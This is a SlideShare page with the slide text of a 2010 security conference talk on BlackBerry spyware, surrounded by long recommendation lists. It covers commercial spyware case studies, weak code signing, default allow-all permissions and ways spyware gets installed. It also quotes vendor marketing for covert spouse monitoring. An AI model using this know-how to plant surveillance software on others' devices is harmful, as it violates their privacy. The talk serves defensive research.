Enviar pesquisa
Carregar
Source Boston 2010 - The Monkey Steals the Berries Part Deux
•
0 gostou
•
334 visualizações
Tyler Shields
Seguir
Tecnologia
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 58
Recomendados
The Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIR
Tyler Shields
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
Tyler Shields
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
Tyler Shields
BRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the Berries
Tyler Shields
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
Tyler Shields
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Tyler Shields
GovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The Berries
Tyler Shields
Neli Vacheva - IDC
Neli Vacheva - IDC
Ivo_Dreshkov
Recomendados
The Coming Wave of Smartphone Attacks - Texas DIR
The Coming Wave of Smartphone Attacks - Texas DIR
Tyler Shields
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
Tyler Shields
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
Tyler Shields
BRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the Berries
Tyler Shields
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
Tyler Shields
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Tyler Shields
GovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The Berries
Tyler Shields
Neli Vacheva - IDC
Neli Vacheva - IDC
Ivo_Dreshkov
Mobile Services in Japan
Mobile Services in Japan
MobileMonday Norway
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
Ross Sleight
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
AdMob Inc
Internet world mobile marketing 270410
Internet world mobile marketing 270410
Jason Cross
Mobile Vas
Mobile Vas
ajaytripti
Facebook: an investment for the future
Facebook: an investment for the future
Ideas4Tomorrow
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
HUNGRY BOYS Creative agency
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru Magazine
The rules of mobile advertising
The rules of mobile advertising
Seungyul Kim
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
Agency of Industrial Marketing
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
James Cameron
DB분야 트렌드, 시장 상황 업데이트
DB분야 트렌드, 시장 상황 업데이트
mosaicnet
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
bianchiassociates
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
Mine ISIK
More Apps More Problems
More Apps More Problems
Tyler Shields
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Tyler Shields
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Tyler Shields
Defending Behind the Mobile Device
Defending Behind the Mobile Device
Tyler Shields
2011 celebration
2011 celebration
mhmayer
CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101
Tyler Shields
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
Tyler Shields
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Tyler Shields
Mais conteúdo relacionado
Mais procurados
Mobile Services in Japan
Mobile Services in Japan
MobileMonday Norway
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
Ross Sleight
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
AdMob Inc
Internet world mobile marketing 270410
Internet world mobile marketing 270410
Jason Cross
Mobile Vas
Mobile Vas
ajaytripti
Facebook: an investment for the future
Facebook: an investment for the future
Ideas4Tomorrow
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
HUNGRY BOYS Creative agency
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru Magazine
The rules of mobile advertising
The rules of mobile advertising
Seungyul Kim
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
Agency of Industrial Marketing
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
James Cameron
DB분야 트렌드, 시장 상황 업데이트
DB분야 트렌드, 시장 상황 업데이트
mosaicnet
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
bianchiassociates
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
Mine ISIK
Mais procurados
(14)
Mobile Services in Japan
Mobile Services in Japan
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
Internet world mobile marketing 270410
Internet world mobile marketing 270410
Mobile Vas
Mobile Vas
Facebook: an investment for the future
Facebook: an investment for the future
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
Procontent.Ru: Andrew Bud (mBlox, MEF) presentation at VAS V Conference
The rules of mobile advertising
The rules of mobile advertising
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
DB분야 트렌드, 시장 상황 업데이트
DB분야 트렌드, 시장 상황 업데이트
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
A DECISION SUPPORT SYSTEM TO DETERMINE THE SPORT SPONSORSHIP RESPONSE
Destaque
More Apps More Problems
More Apps More Problems
Tyler Shields
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Tyler Shields
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Tyler Shields
Defending Behind the Mobile Device
Defending Behind the Mobile Device
Tyler Shields
2011 celebration
2011 celebration
mhmayer
CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101
Tyler Shields
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
Tyler Shields
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Tyler Shields
Teaching pdhpe
Teaching pdhpe
emann1able
QBE Liability Incident Report Form
QBE Liability Incident Report Form
InsuranceRateMonitors2
fantastic5indians
fantastic5indians
Citizens for Accountable Governance
Working with Young People Online
Working with Young People Online
Doug Millen
Destaque
(12)
More Apps More Problems
More Apps More Problems
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Defending Behind the Mobile Device
Defending Behind the Mobile Device
2011 celebration
2011 celebration
CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Teaching pdhpe
Teaching pdhpe
QBE Liability Incident Report Form
QBE Liability Incident Report Form
fantastic5indians
fantastic5indians
Working with Young People Online
Working with Young People Online
Semelhante a Source Boston 2010 - The Monkey Steals the Berries Part Deux
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
AP DealFlow
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
Andris Soroka
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia Pacific
InMobi
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
Web Managers Group
Numbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
Vishal Gurbuxani
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
Exicon
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
Stefan Rust - Exicon Leading digital portfolio management
5 mobile trends (2009)
5 mobile trends (2009)
MobileMonday Switzerland
中国アプリ市場とその周辺
中国アプリ市場とその周辺
良太郎 小原
Seventynine.mobi
Seventynine.mobi
Himanshu Mishra
Byod four steps to enabling your network michael greco
Byod four steps to enabling your network michael greco
K Singh
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Jason Grigsby
Introduction session
Introduction session
bvandennotelaer
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
guestd94b193
DSS_Enterprise MDM MAM Mobile Security - MobileIron Overview_2013
DSS_Enterprise MDM MAM Mobile Security - MobileIron Overview_2013
Andris Soroka
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
Bernard Leong
Smart Pad In 10 months
Smart Pad In 10 months
Seungyul Kim
Overcoming challenges of implementing mobile audience measurement studies in ...
Overcoming challenges of implementing mobile audience measurement studies in ...
Merlien Institute
Mobclix Sfmobile
Mobclix Sfmobile
Vishal Gurbuxani
Android and its apps market overview
Android and its apps market overview
01Booster
Semelhante a Source Boston 2010 - The Monkey Steals the Berries Part Deux
(20)
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia Pacific
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
Numbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
5 mobile trends (2009)
5 mobile trends (2009)
中国アプリ市場とその周辺
中国アプリ市場とその周辺
Seventynine.mobi
Seventynine.mobi
Byod four steps to enabling your network michael greco
Byod four steps to enabling your network michael greco
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Introduction session
Introduction session
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
DSS_Enterprise MDM MAM Mobile Security - MobileIron Overview_2013
DSS_Enterprise MDM MAM Mobile Security - MobileIron Overview_2013
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
Smart Pad In 10 months
Smart Pad In 10 months
Overcoming challenges of implementing mobile audience measurement studies in ...
Overcoming challenges of implementing mobile audience measurement studies in ...
Mobclix Sfmobile
Mobclix Sfmobile
Android and its apps market overview
Android and its apps market overview
Mais de Tyler Shields
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
Tyler Shields
Avoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
Tyler Shields
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Tyler Shields
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Tyler Shields
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Tyler Shields
Static Detection of Application Backdoors
Static Detection of Application Backdoors
Tyler Shields
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Tyler Shields
Anti-Debugging - A Developers View
Anti-Debugging - A Developers View
Tyler Shields
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
Tyler Shields
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
Tyler Shields
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
Tyler Shields
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Tyler Shields
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Tyler Shields
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software Security
Tyler Shields
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-Debugging
Tyler Shields
CarolinaCon 2006 Reverse Engineering 101
CarolinaCon 2006 Reverse Engineering 101
Tyler Shields
Infragard 2004 - Web Attacks and Defenses
Infragard 2004 - Web Attacks and Defenses
Tyler Shields
Mais de Tyler Shields
(17)
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
Avoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Static Detection of Application Backdoors
Static Detection of Application Backdoors
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Anti-Debugging - A Developers View
Anti-Debugging - A Developers View
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Intelligence on the Intractable Problem of Software Security
Intelligence on the Intractable Problem of Software Security
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2006 Reverse Engineering 101
CarolinaCon 2006 Reverse Engineering 101
Infragard 2004 - Web Attacks and Defenses
Infragard 2004 - Web Attacks and Defenses
Último
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
Stephanie Beckett
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
LoriGlavin3
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
LoriGlavin3
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
Dubai Multi Commodity Centre
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
LoriGlavin3
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Precisely
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
Fwdays
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
Alan Dix
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
DianaGray10
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
BookNet Canada
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
Addepto
How to write a Business Continuity Plan
How to write a Business Continuity Plan
Databarracks
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
Mattias Andersson
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
Alfredo García Lavilla
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
Sergiu Bodiu
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
Dilum Bandara
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
Lorenzo Miniero
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
Kalema Edgar
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
LoriGlavin3
Último
(20)
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
How to write a Business Continuity Plan
How to write a Business Continuity Plan
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Source Boston 2010 - The Monkey Steals the Berries Part Deux
1.
Blackberry Mobile Spyware The
Monkey Steals the Berries Tyler Shields Part Deux
2.
Outline Background Case
Studies of Mobile Spyware Blackberry Security Mechanisms Installation Methods Effects and Behaviors Technical Specifications Methods of Detection and Future Work Demonstration © 2010 Veracode, Inc. 2
3.
Presenter Background Currently
Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
4.
Mobile Spyware Often
includes modifications to legitimate programs designed to compromise the device or device data Often inserted by those who have legitimate access to source code or distribution binaries May be intentional or inadvertent Not specific to any particular programming language Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
5.
Attacker Motivation Practical
method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
6.
Why is Mobile
The Future of Spyware © 2010 Veracode, Inc. 6
7.
Units Sold By
Operating System 90,000.00 80,879 80,000.00 72,934 70,000.00 60,000.00 Units Sold 50,000.00 40,000.00 34,347 2008 Units 2009 Units 30,000.00 24,890 23,149 20,000.00 16,498 11,418 10,622 10,000.00 15,028 6,798 1,193 4,027 8,127 641 0 1,112 0.00 Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs Motion Windows Mobile Data Source: DISTMO Appstore Analytics Operating System www.appstore.info © 2010 Veracode, Inc. 7
8.
Units Sold Market
Growth 8% 6% 6% Percentage Growth in Market Share 4% 3% 3% 2% 0% 0% Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs 0% Motion Windows Mobile -2% -2% -3% -3% -4% -6% -6% Operating System Data Source: DISTMO Appstore Analytics www.appstore.info © 2010 Veracode, Inc. 8
9.
Application Counts
160,000 150,998 140,000 120,000 Number Of Applications In Store Last Counted Jan/Feb 2010 100,000 80,000 60,000 40,000 19,897 20,000 6118 5291 1452 944 0 iPhone App Store Android Nokia Ovi Store Blackberry App Palm App Catalog Windows Marketplace (Maemo) World Marketplace Data Source: DISTMO Appstore Analytics Marketplace Name www.appstore.info © 2010 Veracode, Inc. 9
10.
iPhone Applications Sold
3.00 Applications Sold (In Billions) 2.50 2.00 1.50 1.00 0.50 0.00 Data Source: Gartner, Inc., a research and advisory firm © 2010 Veracode, Inc. 10
11.
Back To The
Future © 2010 Veracode, Inc. 11
12.
Back To The
Future © 2010 Veracode, Inc. 12
13.
Case Studies of
Mobile Spyware © 2010 Veracode, Inc. 13
14.
FlexiSpy http://www.flexispy.com $149
- $350 PER YEAR depending on features Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 14
15.
FlexiSpy Web Site
Quotes “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “ “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.” “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 15
16.
Mobile Spy http://www.mobile-spy.com
$49.97 PER QUARTER or $99.97 PER YEAR Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 16
17.
Mobile Spy Web
Site Quotes “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?” “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.” “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 17
18.
Etisalat (SS8) Cell
carrier in United Arab Emirates (UAE) Pushed via SMS as “software patch” for Blackberry smartphones Upgrade urged to “enhance performance” of Blackberry service Blackberry PIN messaging as C&C Sets FLAG_HIDDEN bit to true Interception of outbound email / SMS only Discovered due to flooded listener server cause retries that drained batteries of affected devices Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 18
19.
Bugs & Phonesnoop
Bugs – Exfiltration of inbound and outbound email – Hidden PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 19
20.
Storm8 Phone Number
Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
21.
Symbian Sexy Space
– Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld) Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
22.
Symbian MergoSMS
– The worm spreads as self-signed (untrusted) SIS installers – Installer contains sub-SIS installers some of them signed by Symbian. – Spreads by sending text messages Contain variable messages in Chinese and a link to a website Going to link results in worm download – On phone reboot malware runs, downloads worm payload, completing infection – The worm was spread on Chinese file sharing web sites – Originally spread as games, themes, etc. for Symbian Series60 3rd & 5th edition phones. – http://www.f-secure.com/v-descs/trojan_symbos_merogosms.shtml © 2010 Veracode, Inc. 22
23.
09Droid – Banking
Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included Royal Bank of Canada Chase BB&T SunTrust Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 23
24.
Blackberry Security Mechanisms ©
2010 Veracode, Inc. 24
25.
Blackberry Takes Security
Seriously KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499 Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 25
26.
Does It Really
Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 26
27.
Code Signing Subset
of Blackberry API considered “controlled” Use of controlled package, class, or method requires appropriate code signature Blackberry Signature Tool comes with the Blackberry JDE Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys Install keys into signature tool © 2010 Veracode, Inc. 27
28.
Code Signing Process
Hash of code sent to RIM for API tracking purposes only RIM does not get source code COD file is signed based on required keys Application ready to be deployed Easy to acquire anonymous keys © 2010 Veracode, Inc. 28
29.
IT Policies Requires
connection to Blackberry Enterprise Server (BES) Supersedes lower levels of security restrictions Prevent devices from downloading third-party applications over wireless Prevent installation of specific third-party applications Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 29
30.
Application Policies Can
be controlled at the BES If no BES present, controls are set on the handheld itself Can only be MORE restrictive than the IT policy, never less Control individual resource access per application Control individual connection access per application MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 30
31.
V4.7.0.148 Default 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 31
32.
V5.0.0.328 Default 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 32
33.
V5.0.0.328 Trusted 3rd
Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 33
34.
Installation Methods © 2010
Veracode, Inc. 34
35.
Installation Methods Accessing
a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation) Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer Blackberry BES push the application to your user community Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 35
36.
Installation Files .COD
